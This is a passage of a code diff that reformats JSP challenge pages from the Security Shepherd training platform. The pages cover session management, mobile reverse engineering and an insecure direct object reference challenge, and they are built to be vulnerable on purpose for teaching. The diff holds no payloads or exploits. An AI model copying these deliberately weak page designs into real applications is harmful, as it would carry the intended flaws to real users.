-                    searchTerm: theSearchTerm,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theSearchTerm = $("#searchTerm").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							searchTerm: theSearchTerm,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.jsp b/src/main/webapp/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.jsp
index c8c33577b..4f2572ddc 100644
--- a/src/main/webapp/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.jsp
+++ b/src/main/webapp/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.jsp
@@ -1,201 +1,207 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // Broken Authentication and Session Management Challenge Two
+// Broken Authentication and Session Management Challenge Two
 
 /**
  * <br/><br/>
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
  *
  * @author Mark Denihan
  */
 
-    String levelHash = "d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7";
-    String levelName = "Session Management Challenge Two";
+String levelHash = "d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7";
+String levelName = "Session Management Challenge Two";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
 //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
+String translatedLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/>
-    <form id="leForm" action="javascript:;">
-        <div id="resultsDiv">
-            <table>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.userName") %>
-                    </td>
-                    <td><input type="text" id="subName" autocomplete="off"/></td>
-                </tr>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.password") %>
-                    </td>
-                    <td><input type="password" id="subPassword"
-                               autocomplete="off"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <div id="submitButton">
-                            <input type="submit"
-                                   value="<%= bundle.getString("challenge.form.signIn") %>"/>
-                        </div>
-                    </td>
-                </tr>
-            </table>
-        </div>
-        <small><a id="forgottenPasswordLink" href="#"><%= bundle.getString("challenge.form.forgotPass") %>
-        </a></small>
-    </form>
-    <p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %>
-    </p>
-    <br/>
-    <div id="forgottenPassDiv" style="display: none;">
-        <form id="leForm2" action="javascript:;">
-            <h2 class='title'><%= bundle.getString("reset.header") %>
-            </h2>
-            <p><%= bundle.getString("reset.whatToDo") %>
-            </p>
-            <table>
-                <tr>
-                    </td>
-                    <div id="resetSubmit">
-                        <input id="resetEmail" type="text" autocomplete="off"/><input
-                            type="submit" value="<%= bundle.getString("reset.header") %>"/>
-                    </div>
-                    <p style="display: none;" id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %>
-                    </p>
-                    </td>
-                </tr>
-            </table>
-        </form>
-        <div id="resultsDiv2"></div>
-    </div>
-
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br />
+		<form id="leForm" action="javascript:;">
+			<div id="resultsDiv">
+				<table>
+					<tr>
+						<td><%= bundle.getString("challenge.form.userName") %></td>
+						<td><input type="text" id="subName" autocomplete="off" /></td>
+					</tr>
+					<tr>
+						<td><%= bundle.getString("challenge.form.password") %></td>
+						<td><input type="password" id="subPassword"
+							autocomplete="off" /></td>
+					</tr>
+					<tr>
+						<td colspan="2">
+							<div id="submitButton">
+								<input type="submit"
+									value="<%= bundle.getString("challenge.form.signIn") %>" />
+							</div>
+						</td>
+					</tr>
+				</table>
+			</div>
+			<small><a id="forgottenPasswordLink" href="#"><%= bundle.getString("challenge.form.forgotPass") %></a></small>
+		</form>
+		<p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+		<br />
+		<div id="forgottenPassDiv" style="display: none;">
+			<form id="leForm2" action="javascript:;">
+				<h2 class='title'><%= bundle.getString("reset.header") %></h2>
+				<p><%= bundle.getString("reset.whatToDo") %></p>
+				<table>
+					<tr>
+						</td>
+						<div id="resetSubmit">
+							<input id="resetEmail" type="text" autocomplete="off" /><input
+								type="submit" value="<%= bundle.getString("reset.header") %>" />
+						</div>
+						<p style="display: none;" id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+						</td>
+					</tr>
+				</table>
+			</form>
+			<div id="resultsDiv2"></div>
+		</div>
 
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
 
-        var theSubName = $("#subName").val();
-        var theSubPassword = $("#subPassword").val();
-        $("#loadingSign").show("slow");
-        $("#forgottenPassDiv").hide("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    subName: theSubName,
-                    subPassword: theSubPassword
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#loadingSign").hide("fast", function () {
-                $("#resultsDiv").show("slow");
-            });
-        });
-    });
-
-    $("#leForm2").submit(function () {
-        var theResetEmail = $("#resetEmail").val();
-        $("#resetSubmit").hide("fast");
-        $("#resetLoadingSign").show("slow");
-        $("#resultsDiv2").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "f5ddc0ed2d30e597ebacf5fdd117083674b19bb92ffc3499121b9e6a12c92959",
-                data: {
-                    subEmail: theResetEmail
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv2").html("<p><%= bundle.getString("reset.requestSent") %></p>");
-            } else {
-                $("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv2").show("slow", function () {
-                $("#resetLoadingSign").hide("fast", function () {
-                    $("#resetSubmit").show("slow");
-                });
-            });
-        });
-    });
-
-    $("#forgottenPasswordLink").click(function () {
-        $("#forgottenPassDiv").toggle("slow", function () {
-            //Animation Complete
-            ;
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				
+				var theSubName = $("#subName").val();
+				var theSubPassword = $("#subPassword").val();
+				$("#loadingSign").show("slow");
+				$("#forgottenPassDiv").hide("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							subName: theSubName,
+							subPassword: theSubPassword
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#loadingSign").hide("fast", function(){
+						$("#resultsDiv").show("slow");
+					});
+				});
+			});
+			
+			$("#leForm2").submit(function(){
+				var theResetEmail = $("#resetEmail").val();
+				$("#resetSubmit").hide("fast");
+				$("#resetLoadingSign").show("slow");
+				$("#resultsDiv2").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "f5ddc0ed2d30e597ebacf5fdd117083674b19bb92ffc3499121b9e6a12c92959",
+						data: {
+							subEmail: theResetEmail
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv2").html("<p><%= bundle.getString("reset.requestSent") %></p>");
+					}
+					else
+					{
+						$("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv2").show("slow", function(){
+						$("#resetLoadingSign").hide("fast", function(){
+							$("#resetSubmit").show("slow");
+						});
+					});
+				});
+			});
+			
+			$("#forgottenPasswordLink").click(function(){
+				$("#forgottenPassDiv").toggle("slow", function(){
+					//Animation Complete
+					;
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b.jsp b/src/main/webapp/challenges/dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b.jsp
index 60e80ae0d..0653ac08d 100644
--- a/src/main/webapp/challenges/dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b.jsp
+++ b/src/main/webapp/challenges/dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b.jsp
@@ -1,93 +1,100 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Reverse Engineering 3";
+String levelName = "Mobile Reverse Engineering 3";
 //Alphanumeric Only
-    String levelHash = "dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b.jsp";
+String levelHash = "dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b.jsp";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.reverseEngineer.reverseEngineer", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.reverseEngineer.reverseEngineer", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge3.challengeName");
-    String paragraph1 = bundle.getString("challenge3.para1");
+String LevelName = bundle.getString("challenge3.challengeName");
+String paragraph1 = bundle.getString("challenge3.para1");
 
 //Level blurb can be written here in HTML OR go into the HTML body and write it there. Nobody will update this but you
-    String levelBlurb = "";
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+String levelBlurb = "";
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=LevelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=LevelName%></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%=LevelName%>
-    </h2>
-    <p>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%=LevelName%></h2>
+		<p>
 
-        <%=levelBlurb%>
-        <br/>
-        <%= paragraph1 %><br/> <br> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " ReverseEngineer3.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
-    </p>
-</div>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+			<%=levelBlurb%>
+			<br />
+			<%= paragraph1 %><br /> <br> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " ReverseEngineer3.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+		</p>
+	</div>
+	<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/dfa404130278f44b05dc06486dd06134dac7d843367763a3226c9081f537fb2f.jsp b/src/main/webapp/challenges/dfa404130278f44b05dc06486dd06134dac7d843367763a3226c9081f537fb2f.jsp
index 58cee3f55..65f233bc2 100644
--- a/src/main/webapp/challenges/dfa404130278f44b05dc06486dd06134dac7d843367763a3226c9081f537fb2f.jsp
+++ b/src/main/webapp/challenges/dfa404130278f44b05dc06486dd06134dac7d843367763a3226c9081f537fb2f.jsp
@@ -1,144 +1,151 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    /**
-     * Insecure Direct Object References
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * Insecure Direct Object References
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "Insecure Direct Object References Challenge One";
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            String ApplicationRoot = getServletContext().getRealPath("");
+ String levelName = "Insecure Direct Object References Challenge One";
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		String ApplicationRoot = getServletContext().getRealPath("");
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - Insecure Direct Object References
-        Challenge One</title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - Insecure Direct Object References
+	Challenge One</title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title">Insecure Direct Object Reference Challenge One</h2>
-    <p>
-        The result key for this challenge is stored in the private message
-        for a user that is not listed below... <br/> <br/>
-        <center>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                </td>
-                <select id='userId' style='width: 300px;' multiple>
-                    <option value="c81e728d9d4c2f636f067f89cc14862c">Paul
-                        Bourke
-                    </option>
-                    <option value="eccbc87e4b5ce2fe28308fd9f2a7baf3">Will
-                        Bailey
-                    </option>
-                    <option value="e4da3b7fbbce2345d7772b0674a318d5">Orla
-                        Cleary
-                    </option>
-                    <option value="8f14e45fceea167a5a36dedd4bea2543">Ronan
-                        Fitzpatrick
-                    </option>
-                    <option value="6512bd43d9caa6e02c990b0a82652dca">Pat
-                        McKenana
-                    </option>
-                </select>
-                </td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input style='width: 300px;' type="submit"
-                               value="Show this profile"/>
-                    </div>
-                    <p style="display: none; text-align: center;" id="loadingSign">Loading...</p>
-                </td>
-            </tr>
-        </table>
-    </form>
-    </center>
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var optionValue = $("#userId").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c",
-                data: {
-                    userId: optionValue
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title">Insecure Direct Object Reference Challenge One</h2>
+		<p>
+			The result key for this challenge is stored in the private message
+			for a user that is not listed below... <br /> <br />
+		<center>
+			<form id="leForm" action="javascript:;">
+				<table>
+					<tr>
+						</td>
+						<select id='userId' style='width: 300px;' multiple>
+							<option value="c81e728d9d4c2f636f067f89cc14862c">Paul
+								Bourke</option>
+							<option value="eccbc87e4b5ce2fe28308fd9f2a7baf3">Will
+								Bailey</option>
